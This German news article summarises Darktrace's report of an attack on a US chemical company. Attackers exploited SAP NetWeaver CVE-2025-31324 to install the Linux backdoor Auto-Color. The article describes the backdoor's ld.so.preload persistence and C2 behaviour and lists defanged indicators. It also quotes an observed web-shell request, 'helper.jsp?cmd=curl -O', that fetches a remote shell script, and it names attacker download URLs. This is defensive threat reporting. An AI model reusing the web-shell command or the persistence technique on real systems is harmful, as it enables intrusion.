Hacker schleusen „Auto-Color“-Malware über SAP-Lücke ein – Darktrace stoppt Angriff auf Chemiekonzern

Cyberkriminelle haben eine kritische Sicherheitslücke in SAP NetWeaver (CVE-2025-31324) ausgenutzt, um die bislang kaum bekannte Linux-Malware „Auto-Color“ zu verbreiten. Das Cybersicherheitsunternehmen Darktrace konnte den Angriff im Rahmen einer Incident-Response im April 2025 aufdecken und eindämmen. Ziel der Attacke war ein US-amerikanisches Chemieunternehmen.

Wie Darktrace berichtet, begann die Kompromittierung am 25. April, wobei zwei Tage später eine ELF-Datei – eine ausführbare Linux-Datei – auf ein internes System des Unternehmens übertragen wurde. Die Angreifer nutzten dabei gezielt die Schwachstelle im SAP-System, um sich Zugang zu verschaffen und die Schadsoftware einzuschleusen.

Die Malware „Auto-Color“ war erstmals Ende 2024 bei Angriffen auf Universitäten und Regierungsstellen in Nordamerika und Asien aufgefallen. Laut Palo Alto Networks’ Forschungseinheit Unit 42 handelt es sich um eine besonders hartnäckige Backdoor, die schwer zu erkennen ist und lange Zeit unbemerkt Systeme kompromittieren kann.

Obwohl sie gewisse technische Parallelen zur 2022 entdeckten Symbiote-Malware aufweist, handelt es sich bei Auto-Color um eine eigenständige Bedrohung mit neuen Verschleierungstechniken. Laut Darktrace wurde in dem aktuellen Vorfall eine weiterentwickelte Version eingesetzt, die über zusätzliche Umgehungstaktiken verfügte.

Dank KI-gestützter Erkennung und der Unterstützung durch Sicherheitsexperten konnte Darktrace die Schadsoftware frühzeitig identifizieren und weitere Schäden verhindern.

Was ist CVE-2025-31324?

Am 24. April 2025 gab der Softwareanbieter SAP SE eine kritische Sicherheitslücke in seinem Produkt SAP Netweaver bekannt, nämlich CVE-2025-31324. Die Ausnutzung dieser Schwachstelle würde es böswilligen Akteuren ermöglichen, Dateien auf den SAP Netweaver-Anwendungsserver hochzuladen, was möglicherweise zur Ausführung von Remote-Code und zur vollständigen Kompromittierung des Systems führen könnte. Trotz der dringenden Offenlegung dieser CVE wurde die Schwachstelle auf mehreren Systemen ausgenutzt.

Was ist die Auto-Color-Backdoor-Malware?

Die Auto-Color-Backdoor-Malware, benannt nach ihrer Fähigkeit, sich nach der Ausführung in „/var/log/cross/auto-color“ umzubenennen, wurde erstmals im November 2024 in freier Wildbahn beobachtet und als Remote Access Trojan (RAT) klassifiziert.

Auto-Color wurde vor allem bei Universitäten und Regierungsinstitutionen in den USA und Asien beobachtet.

Was macht die Auto-Color-Backdoor-Malware?

Es ist bekannt, dass sie Linux-Systeme angreift, indem sie integrierte Systemfunktionen wie ld.so.preload ausnutzt, wodurch sie sehr schwer zu erkennen und gefährlich ist. Sie zielt speziell darauf ab, durch die Injektion von gemeinsam genutzten Objekten eine dauerhafte Kompromittierung des Systems zu erreichen.

Jede Instanz verwendet eine eindeutige Datei und einen eindeutigen Hash, da sie statisch kompiliert und verschlüsselt ist und ihre Befehle und Steuerungsdaten (C2) bei der Erstellung einbettet, anstatt sie dynamisch zur Laufzeit abzurufen. Das Verhalten der Malware variiert je nach Berechtigungsstufe des ausführenden Benutzers und der Systemkonfiguration.

Wie funktioniert Auto-Color?

Der Prozess der Malware beginnt mit einer Berechtigungsprüfung. Wenn die Malware ohne Root-Rechte ausgeführt wird, überspringt sie die Phase der Bibliothekseinschleusung und fährt mit eingeschränkter Funktionalität fort. Dabei vermeidet sie Aktionen, die Zugriff auf Systemebene erfordern, wie die Installation von Bibliotheken und die Konfiguration von Preloads, und beschränkt sich stattdessen auf minimale Aktivitäten, während sie weiterhin versucht, die C2-Kommunikation aufrechtzuerhalten. Dies zeigt ein adaptives Verhalten und das Bestreben, die Erkennung in eingeschränkten Umgebungen zu verringern.

Wenn die Malware als Root ausgeführt wird, führt sie eine invasivere Installation durch und installiert ein bösartiges gemeinsam genutztes Objekt namens **libcext.so.2**, das sich als legitime C-Utility-Bibliothek tarnt – eine Taktik, um sich in vertrauenswürdige Systemkomponenten einzufügen. Sie verwendet dynamische Linker-Funktionen wie dladdr(), um den Pfad der Basis-Systembibliothek zu finden. Wenn dies fehlschlägt, wird standardmäßig /lib verwendet.

Persistenz durch Manipulation der Vorladefunktion

Um Persistenz zu gewährleisten, ändert Auto-Color die Datei /etc/ld.so.preload oder erstellt sie neu und fügt einen Verweis auf die schädliche Bibliothek ein. Dies ist eine leistungsstarke Linux-Persistenztechnik, da die in dieser Datei aufgeführten Bibliotheken bei der Ausführung dynamisch verknüpfter ausführbarer Dateien vor allen anderen geladen werden, sodass Auto-Color die Möglichkeit erhält, Standard-Systemfunktionen in fast allen Anwendungen unbemerkt anzuhängen und zu überschreiben.

Nach Abschluss des Vorgangs kopiert sich die ELF-Binärdatei und benennt sich in „**/var/log/cross/auto-color**“ um, wobei sie das Implantat in einem versteckten Verzeichnis ablegt, das den Systemprotokollen ähnelt. Anschließend schreibt sie das schädliche gemeinsam genutzte Objekt in den Basisbibliothekspfad.

Eine verzögerte Nutzlast, die durch ausgehende Kommunikation aktiviert wird

Um die Kette zu vervollständigen, versucht Auto-Color, eine ausgehende TLS-Verbindung zu einer fest codierten IP-Adresse über Port 443 herzustellen. Dadurch kann die Malware über API-Anfragen Befehle oder Payloads von ihrem Betreiber empfangen.

Interessanterweise hat Darktrace festgestellt, dass Auto-Color den Großteil seines bösartigen Verhaltens unterdrückt, wenn diese Verbindung fehlschlägt – eine Ausweichtechnik, die häufig von fortgeschrittenen Angreifern eingesetzt wird. Dadurch wird sichergestellt, dass Sicherheitsanalysten in luftisolierten oder Sandbox-Umgebungen möglicherweise nicht in der Lage sind, die vollständigen Fähigkeiten der Malware zu beobachten oder zu analysieren.

Wenn der C2-Server nicht erreichbar ist, stoppt Auto-Color effektiv und verzichtet auf den Einsatz seiner gesamten schädlichen Funktionen, sodass es für Analysten harmlos erscheint. Dieses Verhalten verhindert, dass Reverse-Engineering-Bemühungen seine Nutzdaten, Mechanismen zum Sammeln von Anmeldedaten oder Persistenztechniken aufdecken.

In realen Umgebungen bedeutet dies, dass die gefährlichsten Komponenten der Malware nur dann aktiviert werden, wenn der Angreifer bereit ist, und während der Analyse oder Detonation inaktiv bleiben, wodurch sie der Erkennung entgehen.

---

Kurzfassung 

Die Linux-Malware „Auto-Color“ verfügt über Funktionen wie Remote-Code-Ausführung, Reverse Shell, Proxy-Weiterleitung, Dateiänderungen und dynamische Konfigurationsupdates. Ein integriertes Rootkit verschleiert ihre Aktivitäten vor Sicherheitslösungen.

Darktrace berichtet, dass Angreifer die SAP-NetWeaver-Schwachstelle CVE-2025-31324 ausnutzen, um Auto-Color einzuschleusen. Die Lücke erlaubt nicht authentifizierten Zugriff und das Hochladen schädlicher Binärdateien. SAP schloss die Sicherheitslücke im April 2025.

Kurz darauf verzeichneten Sicherheitsfirmen wie ReliaQuest, Onapsis und watchTowr vermehrte Angriffsversuche. Im Mai beteiligten sich auch Ransomware-Gruppen und chinesische APTs. Mandiant entdeckte bereits im März Hinweise auf eine Zero-Day-Ausnutzung.

Darktrace identifizierte zusätzlich eine neue Umgehungstechnik, die in aktuellen Auto-Color-Varianten integriert ist.

---

Eine Zeitleiste, die die einzelnen Phasen des Angriffs aufschlüsselt / Quelle: Darktrace

Darktrace berichtet, dass erste Anzeichen ungewöhnlicher Aktivitäten am 25. April 2025 festgestellt wurden. Mehrere eingehende Verbindungen mit URIs, die „/developmentserver/metadatauploader“ enthielten, deuteten auf mögliche Sondierungen im Zusammenhang mit der Schwachstelle CVE-2025-31324 hin. Die tatsächliche Ausnutzung begann zwei Tage später.

Am Morgen des 27. April registrierte Darktrace eine eingehende Verbindung von der IP-Adresse 91.193.19[.]109[.]. Ein klarer Hinweis auf die Ausnutzung der Schwachstelle war die URI „/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1“ in Verbindung mit dem Download einer ZIP-Datei.

Unmittelbar danach wurde eine DNS-Anfrage an die OAST-Domäne aaaaaaaaaaaa[.]d06oojugfd4n58p4tj201hmy54tnq4rak[.]oast[.]me gestellt. Solche Domänen werden häufig von Angreifern zur Prüfung von Schwachstellen und für DNS-Tunneling genutzt.

Die autonome Reaktion von Darktrace griff automatisch ein und verhängte für 30 Minuten ein Verhaltensmuster auf das betroffene Gerät. Dadurch blieb das System innerhalb vorhersehbarer Kommunikationsmuster, während die regulären Geschäftsprozesse weiterliefen.

Warnmeldungen aus dem Modellwarnprotokoll des Geräts, die mögliche DNS-Tunneling-Anfragen an „Request Bin“-Dienste anzeigen. Quelle: Darktrace

 Die autonome Reaktion von Darktrace, die nach einer verdächtigen Tunneling-Verbindung ein „Verhaltensmuster“ auf dem kompromittierten Gerät durchsetzt.  Quelle: Darktrace

Fortgesetzte böswillige Aktivitäten

Das Gerät empfing weiterhin eingehende Verbindungen mit URIs, die „/developmentserver/metadatauploader“ enthielten. Insgesamt wurden sieben Dateien heruntergeladen (siehe Dateinamen im Anhang).

Etwa 10 Stunden später stellte das Gerät eine DNS-Anfrage an „ocr-freespace.oss-cn-beijing.aliyuncs[.]com“.

In derselben Sekunde empfing es auch eine Verbindung von 23.186.200[.]173 mit der URI „/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh“, die ein Shell-Skript namens config.sh herunterlud.

Ausführung

Dieses Skript wurde über die Datei helper.jsp ausgeführt, die während des ersten Exploits heruntergeladen worden war – eine Technik, die auch bei ähnlichen SAP Netweaver-Exploits beobachtet wurde [4].

Darktrace beobachtete anschließend, dass das Gerät DNS- und SSL-Verbindungen zum selben Endpunkt herstellte, wobei eine weitere eingehende Verbindung von 23.186.200[.]173 und dieselbe URI nur zehn Minuten später erneut beobachtet wurden.

Das Gerät stellte dann mehrere Verbindungen zu 47.97.42[.]177 über Port 3232 her, einem Endpunkt, der mit Supershell in Verbindung steht, einer C2-Plattform, die mit Backdoors verknüpft ist und häufig von mit China verbundenen Bedrohungsgruppen eingesetzt wird [5].

Weniger als 12 Stunden später und nur 24 Stunden nach dem ersten Exploit lud der Angreifer eine ELF-Datei von http://146.70.41.178:4444/logs herunter, die die Bereitstellung der Auto-Color-Malware markierte.

Die Erkennung ungewöhnlicher ausgehender Verbindungen durch Darktrace und der anschließende Dateidownload von http://146.70.41.178:4444/logs, wie vom Cyber AI Analyst identifiziert. Quelle: Darktrace

Fazit von Darktrace

Der Vorfall zeigt laut Darktrace deutlich, wie entscheidend das zeitnahe Schließen kritischer Sicherheitslücken ist. Schwachstellen wie CVE-2025-31324 bieten Angreifern einen schnellen Einstiegspunkt, um internetverbundene Systeme zu kompromittieren. In diesem Fall war die Verbreitung der Auto-Color-Malware nur eine von mehreren potenziellen Angriffsmöglichkeiten.

Die Malware demonstrierte ein tiefes Verständnis der Linux-Architektur und agierte mit Bedacht, um unentdeckt zu bleiben. Dennoch konnte Darktrace die anomalen Aktivitäten frühzeitig erkennen und sowohl durch automatisierte Maßnahmen als auch über das eigene MDR-Team reagieren. Dadurch wurde der Angriff eingedämmt, bevor eine stabile C2-Kommunikation aufgebaut werden konnte.

Die schnelle Intervention verschaffte dem Sicherheitsteam des betroffenen Unternehmens wertvolle Zeit, um den Vorfall zu analysieren und weitere Eskalationen zu verhindern.

Quellen: Darktrace und Unit42 

Weitere lesenswerte Artikel im Überblick

---

Bild/Quelle: Pixabay

Folgen Sie uns auf X

Folgen Sie uns auf Bluesky